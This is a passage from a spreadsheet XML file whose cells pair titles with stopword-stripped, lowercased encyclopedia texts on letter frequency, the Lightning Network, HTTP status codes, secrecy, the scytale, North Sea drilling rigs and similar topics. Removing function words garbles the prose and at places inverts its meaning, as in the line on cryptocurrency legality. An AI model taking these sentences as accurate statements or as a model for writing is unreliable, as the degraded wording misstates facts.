italic) esperanto: 'aieon lsrtk' (artificial language lexic influenced indo-european languages, romance, germanic mostly) german: 'ensri atdhu'; (indo-european: germanic) swedish: 'eanrt sildo'; (indo-european: germanic) turkish: 'aeinr lıkdm'; (turkic) dutch: 'enati rodsl'; (indo-european: germanic) polish: 'aioez nrwst'; (indo-european: balto-slavic) danish: 'ernta idslo'; (indo-european: germanic) icelandic: 'arnie stulð'; (indo-european: germanic) finnish: 'ainte slouk'; (uralic: finnic) czech: 'aeoni tvsrl'; (indo-european: balto-slavic) also corpus linguistics rstlne (wheel fortune) english word frequency arabic letter frequency dvorak keyboard layout etaoin shrdlu explanatory notes references external links lewand, robert edward. "cryptographical mathematics". pages.central.edu. archived original 2007-04-02. "some examples letter frequency rankings common languages". www.bckelk.org.uk. "javascript heatmap visualization showing letter frequencies texts different keyboard layouts". www.patrick-wied.at. norvig, peter. updated version mayzner's work using google books ngrams data set". norvig.com. letter frequency—simia.net useful tables useful tables single letter, digram, trigram, tetragram, pentagram frequencies based 20,000 words take account word-length letter-position combinations words letters length: mayzner, m.s.; tresselt, m.e.; wolin, b.r. (1965). "tables single-letter digram frequency counts various word-length letter-position combinations". psychonomic monograph supplements. (2): 13–32. oclc 639975358. mayzner, m.s.; tresselt, m.e.; wolin, b.r. (1965). "tables trigram frequency counts various word-length letter-position combinations". psychonomic monograph supplements. (3): 33–78. mayzner, m.s.; tresselt, m.e.; wolin, b.r. (1965). "tables tetragram frequency counts various word-length letter-position combinations". psychonomic monograph supplements. (4): 79–143. mayzner, m.s.; tresselt, m.e.; wolin, b.r. (1965). "tables pentagram frequency counts various word-length letter-position combinations". psychonomic monograph supplements. (5): 144–190.</t>
  </si>
  <si>
    <t>Secure Electronic Delivery</t>
  </si>
  <si>
    <t>secure electronic delivery (sed) service created 2003 provided british library document supply service (bldss). purpose enable faster delivery digital materials encrypted, copyright-compliant documents, personal e-mail address. these documents supplied british library demand service. when british library supplies articles electronically, sends securely order ensure usage permitted (research purposes) copyright observed. methods publishing industry, authors creators become highly protective assets intellectual property, impose strict rules delivery methods prevent copyright infringement. nowadays, drm-enabled secure delivery appears widely used solution address issues faced libraries supplying ebooks digital materials users. sed, solutions, using adobe livecycle digital rights management (lcdrm) encryption method deliver documents. advantages offers convenience, quality speed documents delivered upon request location device. requested articles scanned high quality reproduction, opened anywhere machine, including mobile devices. restrictions following restrictions hold service implementation: digital material accessible days link sent personal message. copyright reasons, material opened once, saved days allow copy-paste action. upon display, material must printed device reprinted once. demand encryption technology works best default safari browser although browsers accommodate also digital rights management digital asset management references external links page</t>
  </si>
  <si>
    <t>Lightning Network</t>
  </si>
  <si>
    <t>lightning network (ln) "layer payment protocol layered bitcoin (and blockchains cryptocurrencies). intended enable fast transactions among participating nodes proposed solution bitcoin scalability problem. features peer-to-peer system making micropayments cryptocurrency network bidirectional payment channels without delegating custody funds.normal lightning network consists opening payment channel committing funding transaction relevant base blockchain (layer followed making number lightning network transactions update tentative distribution channel's funds without broadcasting blockchain, optionally followed closing payment channel broadcasting final version settlement transaction distribute channel's funds.to settle payments channel must closed. initiate process node broadcasts date settlement transaction network. next events broadly thought ways, cooperative closure parties confirm distribution funds immediately settled uncooperative closure. uncooperative closes legitimate example node longer part network fraudulent node broadcasting outdated, incorrect distribution. uncooperative closures funds settled instantly dispute period within nodes contest broadcast distribution. second node broadcasts date distribution funds transferred entirely them. this punitive act, known breach remedy transaction, prevents nodes attempting defraud network broadcasting out-of-date transactions. history joseph poon thaddeus dryja published draft lightning network white paper february 2015.lightning network endorsed mobile payment entrepreneur jack dorsey. 2017 first lightning transaction litecoin 2017, christian decker blockstream made first full, secure lightning payment non-test network, first lightning payment litecoin, sending microscopic payment normally possible economic blockchain, fully settled fraction second. 2019 bitcoin lightning torch january 2019, pseudonymous twitter user hodlonaut began game-like promotional test lightning network sending 100,000 satoshis (0.001 bitcoin) trusted recipient recipient added 10,000 satoshis ($0.34 time) send next trusted recipient. "lightning torch" payment reached notable personalities including twitter jack dorsey, litecoin creator charlie lee, lightning labs elizabeth stark, binance "cz" changpeng zhao, among others. lightning torch passed times reaching formerly hard-coded limit 4,390,000 satoshis. final payment lightning torch sent april 2019 donation 4,290,000 satoshis ($217.78 time) bitcoin venezuela, non-profit promotes bitcoin venezuela. 2021 adoption salvador june 2021, legislative assembly salvador voted legislation make bitcoin legal tender salvador. decision based success bitcoin beach ecosystem zonte used based wallet. government introduced wallet utilising lightning network protocol giving freedom citizens bitcoin lightning wallets. design andreas antonopoulos referred lightning network second layer routing network. payment channels allow participants transfer money without make transactions public blockchain. this done penalizing uncooperative participants. when opening channel, participants must commit amount funding transaction, blockchain). time-based script extensions like checksequenceverify checklocktimeverify make penalties possible. presume large network channels bitcoin blockchain, bitcoin users participating graph least channel open bitcoin blockchain, possible create near-infinite amount transactions inside network. transactions broadcast bitcoin blockchain prematurely uncooperative channel counterparties. checksequenceverify (csv) bitcoin improvement proposal details hash time-locked contracts implemented used lightning: 0112. benefits there several claimed future benefits using lightning network compared on-chain transactions: atomic swap: atomic swap first introduced tier nolan bitcointalk forums 2013. nolan outlined basic principles cross-chain cryptocurrency swaps using simple cryptocurrency trades across different types blockchains. fast forward september 2017, atomic swaps captured attention cryptocurrency community large litecoin founder charlie announced successful execution atomic swap litecoin bitcoin twitter. granularity: according andreas antonopoulos, implementations lightning network allow payments smaller satoshi, smallest unit base layer bitcoin. routing fees paid intermediary nodes lightning network frequently denominated millisatoshis msat. privacy: details individual lightning network payments publicly recorded blockchain. lightning network payments routed many sequential channels node operator able payments across channels, able source destination funds non-adjacent. speed: settlement time lightning network transactions minute occur milliseconds. confirmation time bitcoin blockchain, comparison, occurs every minutes, average. transaction throughput: there fundamental limits amount payments second occur protocol. amount transactions limited capacity speed node. limitations lightning network made bidirectional payment channels nodes combined create smart contracts. time either party drops channel, channel close settled blockchain.due nature lightning network's dispute mechanism, requires users watch blockchain constantly fraud, concept "watchtower" developed, trust outsourced watchtower nodes monitor fraud. routing event bi-directional payment channel open transacting parties, payment must routed network. this done using onion routing technique similar tor, requires sender receiver payment enough established peers common find path payment. effect, simple route would look like this: wants alice alice channel open other. channel open carol, alice also channel open carol route payment, sends carol, carol sends alicethe original whitepaper reference routing suggests "eventually, optimizations, network look like tier-1 isps". implementations bolt (basis lightning technology) specifications drafted late 2016. several implementations made: lightning labs' (lightning network daemon) implementation blockstream's core lightning (cln) implementation acinq's eclair implementation scala other community projects (e.g. "rust-lightning" "dotnetlightning") languages rust stakenet’s lightning network based decentralized exchange (called stakenet dex) non-commercial implementation digital currency initiative using non-bolt-compatible protocol golanglightning network enables near-instant payments. this feature critical adoption bitcoin bitcoin beach, zonte salvador end-user lightning, several wallets available wallet satoshi bluewallet muun phoenix bitcoin lightning wallet breez lightning labs' walletwallets either custodial non-custodial custodial means private keys underlying bitcoin control custodian end-user. this custodial relationship simplifies user experience also introduces counterparty risk. custodial solutions allow connections national banking systems. following wallets connect national banks, allowing wallets bitcoin exchanges also. strike (united states) pouch.ph (philippines) bottlepay (european union) cases cryptocurrency exchanges bitfinex kraken enable deposits withdrawals. laszlo hanyecz, gained fame cryptocurrency community paying 10,000 pizzas 2010, bought pizzas 2018 using lightning network paid 0.00649 btc. references external links lightning.network dci.mit.edu/lightning-network/ lists.linuxfoundation.org/pipermail/lightning-dev/ linux foundation servers</t>
  </si>
  <si>
    <t>Lindsay Memorandum</t>
  </si>
  <si>
    <t>lindsay memorandum report written martin lindsay, captain british army, detailed various short-comings ineptitude accompanied british army's involvement norwegian campaign spring 1940. overview spring 1940 britain decided send troops northern norway lindsay, experience organising polar expeditions, obvious choice help advise particular problems climate terrain could bring military operations. however became deeply critical poorly organised ill-prepared operation norway extent feared britain would lose unless important lessons learned following debacle. lindsay first soldiers reach london following evacuation norway, presented candid account operation members majesty's opposition clement attlee herbert morrison. report lindsay recalled operation riven utmost incompetence, contended went government. gravity report lost lindsay quoted being: “aware officer write written regulations, consider truth made known public interest buried.” evidence presented lindsay used attlee order bring vote censure leadership prime minister neville chamberlain, ultimately chamberlain's resignation, appointment winston churchill creation coalition government. references</t>
  </si>
  <si>
    <t>Link encryption</t>
  </si>
  <si>
    <t>link encryption approach communications security encrypts decrypts network traffic network routing point (e.g. network switch, node passes) arrival final destination. this repeated decryption encryption necessary allow routing information contained transmission read employed direct transmission toward destination, re-encrypted. this contrasts end-to-end encryption internal information, header/routing information, encrypted sender point origin decrypted intended recipient. link encryption offers main advantages: encryption automatic less opportunity human error. communications link operates continuously carries unvarying level traffic, link encryption defeats traffic analysis.on hand, end-to-end encryption ensures intended recipient access plaintext. link encryption used end-to-end systems superencrypting messages. bulk encryption refers encrypting large number circuits once, multiplexed. references</t>
  </si>
  <si>
    <t>Legality of cryptocurrency by country or territory</t>
  </si>
  <si>
    <t>legal status cryptocurrencies varies substantially jurisdiction another, still undefined changing many them. whereas, majority countries usage cryptocurrency illegal, status usability means payment commodity) varies, differing regulatory implications.while states explicitly allowed trade, others banned restricted likewise, various government agencies, departments, courts classified cryptocurrencies differently. detail intergovernmental organization detail country territory alphabetical index classifications africa northern africa western africa east central africa southeast africa horn africa indian ocean states southern africa americas north america central america caribbean south america asia central asia west asia south asia east asia southeast asia europe central europe eastern europe northern europe southern europe western europe oceania australasia melanesia micronesia polynesia also regulation algorithms taxation cryptocurrency splits bitcoin anti-bitcoin protests footnotes references external links regulation bitcoin selected jurisdictions law.gov</t>
  </si>
  <si>
    <t>Secret decoder ring</t>
  </si>
  <si>
    <t>secret decoder ring secret decoder) device allows decode simple substitution cipher—or encrypt message working opposite direction.as inexpensive toys, secret decoders often used promotional items retailers, well radio television programs, 1930s current day. decoders, whether badges rings, entertaining children common fascination encryption, ciphers, secret codes, used send hidden messages back forth another. history secret decoders generally circular scales, descendants cipher disk developed 15th century leon battista alberti. rather complex polyalphabetic alberti cipher method, decoders children invariably simple caesar cipher substitutions. well-known example started 1934 ovaltine company's sponsored radio program little orphan annie. show's club, "radio orphan annie's secret society", distributed member's handbook included simple substitution cipher resulting numeric cipher text. this followed next year membership included cipher disk enciphering letters numbers 1-26. from 1935 1940, metal decoders produced promotion. from 1941 paper decoders produced. similar metal badges pocket decoders continued captain midnight radio television programs. none early decoders form finger rings; however, "secret compartment" rings common radio program premiums. early 1960s, secret decoder rings appeared notably conjunction jonny quest television program sponsored shoes. later, less ornate, decoder ring offered cereals.today, high quality, stainless steel decoder rings children adults produced companies retroworks think geek. messages ovaltine companies marketed early decoders children often included "secret messages" radio shows aimed children. these could decoded preview next episode show. film references film christmas story (1983) depicts little orphan annie radio show transmitting secret message deciphered sure drink ovaltine", unlike actual broadcasts' secret code segments, usually previewed upcoming episode.decoder rings mentioned arnold schwarzenegger's character last action hero.a "drogan's decoder ring" mentioned 1985 comedy movie spies like characters played stephen hoye aykroyd.laura petrie mentions husband, rob's "captain midnight decoder ring," season episode dick dyke show. also caesar cipher cipher disk jefferson disk references</t>
  </si>
  <si>
    <t>Secrecy</t>
  </si>
  <si>
    <t>secrecy practice hiding information certain individuals groups "need know", perhaps sharing individuals. that kept hidden known secret. secrecy often controversial, depending content nature secret, group people keeping secret, motivation secrecy. secrecy government entities often decried excessive promotion poor operation; excessive revelation information individuals conflict virtues privacy confidentiality. often contrasted social transparency. secrecy exist number different ways: encoding encryption (where mathematical technical strategies used hide messages), true secrecy (where restrictions upon take part message, government security classification) obfuscation, secrets hidden plain sight behind complex idiosyncratic language (jargon) steganography. another classification proposed claude shannon 1948 reads three systems secrecy within communication: concealment systems, including methods invisible ink, concealing message innocent text, fake covering cryptogram, methods existence message concealed enemy privacy systems, example, voice inversion, special equipment required recover message "true" secrecy systems meaning message concealed cypher, code, etc., although existence hidden, enemy assumed special equipment necessary intercept record transmitted signal sociology animals conceal location nest predators. squirrels bury nuts, hiding them, remember locations later.humans attempt consciously conceal aspects others shame, fear violence, rejection, harassment, loss acceptance, loss employment. humans also attempt conceal aspects self capable incorporating psychologically conscious being. families sometimes maintain "family secrets", obliging family members never discuss disagreeable issues concerning family outsiders sometimes even within family. many "family secrets" maintained using mutually agreed-upon construct official family story) speaking outside members. agreement maintain secret often coerced "shaming" reference family honor. information even something trivial recipe. secrets sometimes kept provide pleasure surprise. this includes keeping secret surprise party, telling spoilers story, avoiding exposure magic trick.keeping one's strategy secret important many aspects game theory.in anthropology secret sharing people establish traditional relations people. commonly used narrative describes kind behavior joseph conrad's short story "the secret sharer". government governments often attempt conceal information governments public. these state secrets include weapon designs, military plans, diplomatic negotiation tactics, secrets obtained illicitly others ("intelligence"). most nations form official secrets (the espionage u.s.) classify material according level protection needed (hence term "classified information"). individual needs security clearance access protection methods, keeping documents safe, stipulated.few people dispute desirability keeping critical nuclear weapon design information secret, many believe government secrecy excessive often employed political purposes. many countries laws attempt limit government secrecy, u.s. freedom information sunshine laws. government officials sometimes leak information supposed keep secret. (for recent (2005) example, plame affair.)secrecy elections growing issue, particularly secrecy vote counts computerized vote counting machines. while voting, citizens acting unique sovereign "owner" capacity (instead subject laws, true outside elections) selecting government servants. argued secrecy impermissible public area elections government gets power taxing authority. event, permissible secrecy varies significantly context involved. corporations organizations, ranging multi-national profit corporations nonprofit charities, keep secrets competitive advantage, meet legal requirements, cases, conceal nefarious behavior.new products development, unique manufacturing techniques, simply lists customers types information protected trade secret laws. research corporate secrecy studied factors supporting secret organizations. particular, scholars economics management paid attention firms participating cartels work together maintain secrecy conceal activities antitrust authorities. diversity participants terms size firms) influences ability coordinate avoid detected. patent system encourages inventors publish information exchange limited time monopoly use, though patent applications initially secret. secret societies secrecy attract members creating sense importance.shell companies used launder money criminal activity, finance terrorism, evade taxes. registers beneficial ownership fighting corporate secrecy sense.other laws require organizations keep certain information secret, medical records (hipaa u.s.), financial reports preparation limit insider trading). europe particularly strict laws database privacy.in many countries, neoliberal reforms government included expanding outsourcing government tasks functions private businesses improving efficiency effectiveness government administration. however, among criticisms reforms claim pervasive "commercial-in-confidence" secrecy) clauses contracts government private providers limits public accountability governments prevents proper public scrutiny performance probity private companies. concerns raised 'commercial-in-confidence' open abuse deliberately used hide corporate government maladministration even corruption. computing preservation secrets goals information security. techniques used include physical security cryptography. latter depends secrecy cryptographic keys. many believe security technology effective kept secret.information hiding design principle much software engineering. considered easier verify software reliability sure different parts program access (and therefore depend known limited amount information. military military secrecy concealing information martial affairs purposely made available general public hence enemy, order gain advantage reveal weakness, avoid embarrassment, help propaganda efforts. most military secrets tactical nature, strengths weaknesses weapon systems, tactics, training methods, plans, number location specific weapons. some secrets involve information broader areas, secure communications, cryptography, intelligence operations, cooperation third parties. views excessive secrecy often cited source much human conflict. order hold secret, might lead psychological repercussions. alternative, declining answer asked something, suggest answer therefore always suitable keeping secret. also, insist answer question.nearly 2500 years ago, sophocles wrote, nothing secretly; time sees hears things, discloses all." gautama siddhartha, buddha, said "three things cannot long stay hidden: sun, moon truth". bible addresses this: sure find out." numbers 32:23 also references further reading seth stephens-davidowitz (2018). everybody lies: data, data, what internet tell about really are. street books. isbn 978-0062390868. external links open source collection readings secrecy secrecy news federation american scientists</t>
  </si>
  <si>
    <t>List of FTP server return codes</t>
  </si>
  <si>
    <t>server return codes always three digits, digit special meaning. first digit denotes whether response good, incomplete: second digit grouping digit encodes following information: below list known return codes issued server. also list commands list http status codes references</t>
  </si>
  <si>
    <t>List of HTTP status codes</t>
  </si>
  <si>
    <t>this list hypertext transfer protocol (http) response status codes. status codes issued server response client's request made server. includes codes ietf request comments (rfcs), specifications, additional codes used common applications http. first digit status code specifies five standard classes responses. message phrases shown typical, human-readable alternative provided. unless otherwise stated, status code part http/1.1 standard (rfc 7231).the internet assigned numbers authority (iana) maintains official registry http status codes.all http response status codes separated five classes categories. first digit status code defines class response, last digits classifying categorization role. there five classes defined standard: informational response request received, continuing process successful request successfully received, understood, accepted redirection action needs taken order complete request client error request contains syntax cannot fulfilled server error server failed fulfil apparently valid request informational response informational response indicates request received understood. issued provisional basis request processing continues. alerts client wait final response. message consists status line optional header fields, terminated empty line. http/1.0 standard define status codes, servers must send response http/1.0 compliant client except experimental conditions. continue server received request headers client proceed send request body case request body needs sent; example, post request). sending large request body server request rejected inappropriate headers would inefficient. server check request's headers, client must send expect: 100-continue header initial request receive continue status code response sending body. client receives error code (forbidden) (method allowed) send request's body. response expectation failed indicates request repeated without expect header indicates server support expectations (this case, example, http/1.0 servers). switching protocols requester asked server switch protocols server agreed processing (webdav; 2518) webdav request contain many sub-requests involving file operations, requiring long time complete request. this code indicates server received processing request, response available yet. this prevents client timing assuming request lost. early hints (rfc 8297) used return response headers final http message. success this class status codes indicates action requested client received, understood, accepted. standard response successful http requests. actual response depend request method used. request, response contain entity corresponding requested resource. post request, response contain entity describing containing result action. created request fulfilled, resulting creation resource. accepted request accepted processing, processing completed. request might might eventually acted upon, disallowed processing occurs. non-authoritative information (since http/1.1) server transforming proxy (e.g. accelerator) received origin, returning modified version origin's response. content server successfully processed request, returning content. reset content server successfully processed request, asks requester reset document view, returning content. partial content (rfc 7233) server delivering part resource (byte serving) range header sent client. range header used http clients enable resuming interrupted downloads, split download multiple simultaneous streams. multi-status (webdav; 4918) message body follows default message contain number separate response codes, depending many sub-requests made. already reported (webdav; 5842) members binding already enumerated preceding part (multistatus) response, included again. used (rfc 3229) server fulfilled request resource, response representation result instance-manipulations applied current instance. redirection this class status code indicates client must take additional action complete request. many status codes used redirection.a user agent carry additional action user interaction method used second request head. user agent automatically redirect request. user agent detect intervene prevent cyclical redirects. multiple choices indicates multiple options resource client choose (via agent-driven content negotiation). example, code could used present multiple video format options, list files different filename extensions, suggest word-sense disambiguation. moved permanently this future requests directed given uri. found (previously "moved temporarily") tells client look (browse another url. http/1.0 specification (rfc 1945) required client perform temporary redirect method (the original describing phrase "moved temporarily"), popular browsers implemented redirects changing method get. therefore, http/1.1 added status codes distinguish behaviours. other (since http/1.1) response request found another using method. when received response post put/delete), client presume server received data issue request given uri. modified (rfc 7232) indicates resource modified since version specified request headers if-modified-since if-none-match. case, need retransmit resource since client still previously-downloaded copy. proxy (since http/1.1) requested resource available proxy, address provided response. security reasons, many http clients (such mozilla firefox internet explorer) obey status code. switch proxy longer used. originally meant "subsequent requests specified proxy." temporary redirect (since http/1.1) case, request repeated another uri; however, future requests still original uri. contrast historically implemented, request method allowed changed reissuing original request. example, post request repeated using another post request. permanent redirect (rfc 7538) this future requests directed given uri. parallel behaviour 301, allow http method change. example, submitting form permanently redirected resource continue smoothly. client errors this class status code intended situations error seems caused client. except responding head request, server include entity containing explanation error situation, whether temporary permanent condition. these status codes applicable request method. user agents display included entity user. request server cannot process request apparent client error (e.g., malformed request syntax, size large, invalid request message framing, deceptive request routing). unauthorized (rfc 7235) similar forbidden, specifically authentication required failed provided. response must include www-authenticate header field containing challenge applicable requested resource. basic access authentication digest access authentication. semantically means "unauthorised", user valid authentication credentials target resource. note: some sites incorrectly issue http address banned website (usually website domain) specific address refused permission access website. payment required reserved future use. original intention code might used part form digital cash micropayment scheme, proposed, example, taler, happened, code widely used. google developers uses status particular developer exceeded daily limit requests. sipgate uses code account sufficient funds start call. shopify uses code store paid fees temporarily disabled. stripe uses code failed payments parameters correct, example blocked fraudulent payments. forbidden request contained valid data understood server, server refusing action. this user necessary permissions resource needing account sort, attempting prohibited action (e.g. creating duplicate record allowed). this code also typically used request provided authentication answering www-authenticate header field challenge, server accept authentication. request repeated. found requested resource could found available future. subsequent requests client permissible. method allowed request method supported requested resource; example, request form requires data presented post, request read-only resource. acceptable requested resource capable generating content acceptable according accept headers sent request. content negotiation. proxy authentication required (rfc 7235) client must first authenticate proxy. request timeout server timed waiting request. according http specifications: "the client produce request within time server prepared wait. client repeat request without modifications later time." conflict indicates request could processed conflict current state resource, edit conflict multiple simultaneous updates. gone indicates resource requested previously longer available available again. this used resource intentionally removed resource purged. upon receiving status code, client request resource future. clients search engines remove resource indices. most cases require clients search engines purge resource, "404 found" used instead. length required request specify length content, required requested resource. precondition failed (rfc 7232) server meet preconditions requester request header fields. payload large (rfc 7231) request larger server willing able process. previously called "request entity large". long (rfc 7231) provided long server process. often result much data encoded query-string request, case converted post request. called "request-uri long" previously. unsupported media type (rfc 7231) request entity media type server resource support. example, client uploads image image/svg+xml, server requires images different format. range satisfiable (rfc 7233) client asked portion file (byte serving), server cannot supply portion. example, client asked part file lies beyond file. called "requested range satisfiable" previously. expectation failed server cannot meet requirements expect request-header field. teapot (rfc 2324, 7168) this code defined 1998 traditional ietf april fools' jokes, 2324, hyper text coffee control protocol, expected implemented actual http servers. specifies code returned teapots requested brew coffee. this http status used easter websites, google.com's "i'm teapot" easter egg. misdirected request (rfc 7540) request directed server able produce response (for example connection reuse). unprocessable entity (webdav; 4918) request well-formed unable followed semantic errors. locked (webdav; 4918) resource accessed locked. failed dependency (webdav; 4918) request failed depended another request request failed (e.g., proppatch). early (rfc 8470) indicates server unwilling risk processing request might replayed. upgrade required client switch different protocol tls/1.3, given upgrade header field. precondition required (rfc 6585) origin server requires request conditional. intended prevent 'lost update' problem, client gets resource's state, modifies puts back server, meanwhile third party modified state server, leading conflict. many requests (rfc 6585) user sent many requests given amount time. intended rate-limiting schemes. request header fields large (rfc 6585) server unwilling process request either individual header field, header fields collectively, large. unavailable legal reasons (rfc 7725) server operator received legal demand deny access resource resources includes requested resource. code chosen reference novel fahrenheit (see acknowledgements rfc). server errors server failed fulfil request.response status codes beginning digit indicate cases server aware encountered error otherwise incapable performing request. except responding head request, server include entity containing explanation error situation, indicate whether temporary permanent condition. likewise, user agents display included entity user. these response codes applicable request method. internal server error generic error message, given unexpected condition encountered specific message suitable. implemented server either recognize request method, lacks ability fulfil request. usually implies future availability (e.g., feature web-service api). gateway server acting gateway proxy received invalid response upstream server. service unavailable server cannot handle request (because overloaded maintenance). generally, temporary state. gateway timeout server acting gateway proxy receive timely response upstream server. http version supported server support http protocol version used request. variant also negotiates (rfc 2295) transparent content negotiation request results circular reference. insufficient storage (webdav; 4918) server unable store representation needed complete request. loop detected (webdav; 5842) server detected infinite loop processing request (sent instead already reported). extended (rfc 2774) further extensions request required server fulfil network authentication required (rfc 6585) client needs authenticate gain network access. intended intercepting proxies used control access network (e.g., "captive portals" used require agreement terms service granting full internet access wi-fi hotspot). unofficial codes following codes specified standard. page expired (laravel framework) used laravel framework csrf token missing expired. method failure (spring framework) deprecated response used spring framework method failed. enhance your calm (twitter) returned version twitter search trends client rate limited; versions later many requests response code instead. phrase "enhance calm" comes 1993 movie demolition man, association number likely reference cannabis. request header fields large (shopify) used shopify, instead many requests response code, many urls requested within certain time frame. blocked windows parental controls (microsoft) microsoft extension code indicated windows parental controls turned blocking access requested webpage. invalid token (esri) returned arcgis server. code indicates expired otherwise invalid token. token required (esri) returned arcgis server. code indicates token required submitted. bandwidth limit exceeded (apache server/cpanel) server exceeded bandwidth specified server administrator; often used shared hosting providers limit bandwidth customers. site overloaded used qualys ssllabs server testing signal site can't process request. site frozen used pantheon platform indicate site frozen inactivity. (informal convention) network read timeout error used http proxies signal network read timeout behind proxy client front proxy. network connect timeout error error used http proxies signal network connect timeout behind proxy client front proxy. internet information services microsoft's internet information services (iis) server expands error space signal errors client's request. login time-out client's session expired must again. retry with server cannot honour request user provided required information. redirect used exchange activesync either efficient server available server cannot access users' mailbox. client expected re-run http autodiscover operation find appropriate server.iis sometimes uses additional decimal sub-codes specific information, however sub-codes appear response payload documentation, place actual http status code. nginx nginx server software expands error space signal issues client's request. response used internally instruct server return information client close connection immediately. request header large client sent large request long header line. certificate error expansion request response code, used client provided invalid client certificate. certificate required expansion request response code, used client certificate required provided. http request sent https port expansion request response code, used client made http request port listening https requests. client closed request used client closed request server could send response. cloudflare cloudflare's reverse proxy service expands series errors space signal issues origin server. server returned unknown error origin server returned empty, unknown, unexpected response cloudflare. server down origin server refused connections cloudflare. security solutions origin blocking legitimate connections certain cloudflare addresses. connection timed cloudflare timed contacting origin server. origin unreachable cloudflare could reach origin server; example, records origin server incorrect missing. timeout occurred cloudflare able complete connection origin server, receive timely http response. handshake failed cloudflare could negotiate ssl/tls handshake origin server. invalid certificate cloudflare could validate certificate origin server. also used cloud foundry's gorouter. railgun error error indicates interrupted connection cloudflare origin server's railgun server. error returned along 1xxx error. elastic load balancer amazon's elastic load balancing adds custom return codes client closed connection load balancer idle timeout period elapsed. typically client timeout sooner elastic load balancer's timeout. load balancer received x-forwarded-for request header addresses. unauthorized error around authentication returned server registered load balancer. configured listener rule authenticate users, identity provider (idp) returned error code authenticating user. caching warning codes following caching related warning codes specified 7234. unlike status codes above, sent response status http protocol, part "warning" http header. since header often neither sent servers acknowledged clients, obsoleted http working group 9111. response stale response provided cache stale (the content's exceeds maximum cache-control header heuristically chosen lifetime). revalidation failed cache unable validate response, inability reach origin server. disconnected operation cache intentionally disconnected rest network. heuristic expiration cache heuristically chose freshness lifetime greater hours response's greater hours. miscellaneous warning arbitrary, non-specific warning. warning text logged presented user. transformation applied added proxy applies transformation representation, changing content encoding, media type like. miscellaneous persistent warning same 199, indicating persistent warning. also custom error pages list server return codes list http header fields list smtp server return codes common format notes references external links 7231 hypertext transfer protocol (http/1.1): semantics content section response status codes hypertext transfer protocol (http) status code registry microsoft knowledge base: mskb943891: http status codes microsoft office knowledge base: error code 2–11</t>
  </si>
  <si>
    <t>SecMsg</t>
  </si>
  <si>
    <t>emudhra secmsg mobile application designed secure channel. allows users send sms's encrypted signed using technology ensures decrypted intended user. algorithms used crypto processes like signing, encryption, decryption rsa/ecc, sha. technical insight pair generation pair generated application stored mobile. these keys used crypto process like signing, encryption decryption. pair generation onetime process completely user driven. user also x.509 digital certificates certification authority (ca) crypto processes mentioned above. built-in-security user required provide application whenever wants gain access pair protected controls signing, encryption/decryption processes. usage areas secure communication secmsg used send receive confidential messages. secure communication peers established exchanging public friends/spouse/colleagues. public received peers stored application. messages composed user encrypted recipient's public land inbox secmsg. this message decrypted intended recipient's private only.[see fig.1] secure safe vault' organizer gives additional security store personal information protected pin. information stored encrypted private key. two-factor authentication online transaction (fund transfer, payee, online broking, confirmation) acknowledged digitally signing transaction details. this ensures confidentiality, integrity importantly repudiation. acknowledgment transaction thus made cannot repudiated later. password/atm retrieval users application resetting/receiving passwords. banks send pin/internet banking passwords encrypted text message digitally signed acknowledgment received time. features this application supports multiple x.509 certificates certification authority (ca). these digital signatures also used digital signing encryption/decryption. logging history transactions messages, access requires pin. remote data wiping clearing contents application mobile lost. uses simplest ubiquitous communication mode-sms channel. operating cost. extensive device support. secmsg news article secmsg network computing secmsg coverage economic times secmsg coverage dataquest also mobile signature digital signature public-key cryptography references</t>
  </si>
  <si>
    <t>List of ciphertexts</t>
  </si>
  <si>
    <t>some famous ciphertexts cryptograms), chronological order date, are: also undeciphered writing systems (cleartext, natural-language writing unknown meaning) external links elonka dunin's list famous unsolved codes ciphers</t>
  </si>
  <si>
    <t>Sea Quest</t>
  </si>
  <si>
    <t>quest semi-submersible drilling rig. discovered uk's first north september 1969 arbroath field. also discovered first giant field named forties october 1970.the quest built belfast shipbuilders harland wolff cost £3.5 million launched january 1966. entire structure feet high weighed 150,000 tons, including three legs feet diameter feet long could partially filled water control height platform sea.in 1977, quest sold sedco (now part transocean) renamed sedco 135c. towed west coast africa. january 1980, drilling warri area, nigeria, blowout occurred sustained extensive fire damage. deliberately sunk deep water. references</t>
  </si>
  <si>
    <t>Sea Gem</t>
  </si>
  <si>
    <t>first british jack-up rig, known collapse coast lincolnshire december 1965, steel support legs buckled capsized, resulting fatalities. background early 1960s, companies found crude great britain, well netherlands germany, suspected found north sea. barriers overcome possible search gas. there international agreements addressed rights various minerals areas outside three-mile limit. also, technology required developed, matured enough commercially usable. main factor companies generally think significant enough reserves north warrant usage resources search oil. this situation changed however, fields groningen field netherlands, certain extent, eakring nottinghamshire, proved contain fairly large reserves, thus prompting companies begin search nearby areas, including north sea. made first british discovery natural september 1965, although find small commercially profitable. originally 5,600 steel barge, converted function british petroleum 1964. conversion involved fitting steel legs, making possible raise barge metres water's surface; well helipad, living quarters crew drilling tower associated structures. disaster december 1965, located approximately kilometres nmi) coast lincolnshire. crew process moving another site approximately nautical miles (3.7 away. this process involved lowering onto surface water, float site. when lowered, legs crumpled broke, causing capsize, equipment people sliding freezing cold north sea. radio among equipment fell sea, never sent emergency signal. nearby british freight ship baltrover observed capsizing. crew sent emergency signals proceeded help rescue crew together royal force civilian helicopter. result public inquiry accident, several changes made order improve safety rigs, amongst stand-by boat, would able help rescue crews event future accidents, recognition offshore installation manager. inquiry concluded brittle fracture part suspension system linking hull legs blame collapse. also louie minerals workings (offshore installations) 1971 references external links dukes wood museum</t>
  </si>
  <si>
    <t>Scytale</t>
  </si>
  <si>
    <t>cryptography, scytale also transliterated skytale, ancient greek: σκυτάλη skutálē "baton, cylinder", also σκύταλον skútalon) tool used perform transposition cipher, consisting cylinder strip parchment wound around written message. ancient greeks, spartans particular, said used cipher communicate military campaigns. recipient uses diameter parchment wrapped read message. encrypting suppose allows write four letters around circle five letters side plaintext could hurt badly help". encrypt, simply writes across leather: _____________________________________________________________ |__| _____________________________________________________________ ciphertext becomes, "iryyatbhmvaehedlurlp" unwinding. decrypting decrypt, must wrap leather strip around read across. ciphertext "iryyatbhmvaehedlurlp" every fifth letter appear line, plaintext (after re-insertion spaces) becomes: hurt badly help". history from indirect evidence, scytale first mentioned greek poet archilochus, lived century other greek roman writers following centuries also mentioned apollonius rhodes (middle century clear indication cryptographic device appeared. description operated known plutarch (50–120 ad): dispatch-scroll following character. when ephors send admiral general, make round pieces wood exactly alike length thickness, corresponds dimensions, keep themselves, give envoy. these pieces wood call scytalae. whenever, then, wish send secret important message, make scroll parchment long narrow, like leathern strap, wind round scytale, leaving vacant space thereon, covering surface round parchment. after this, write wish parchment, lies 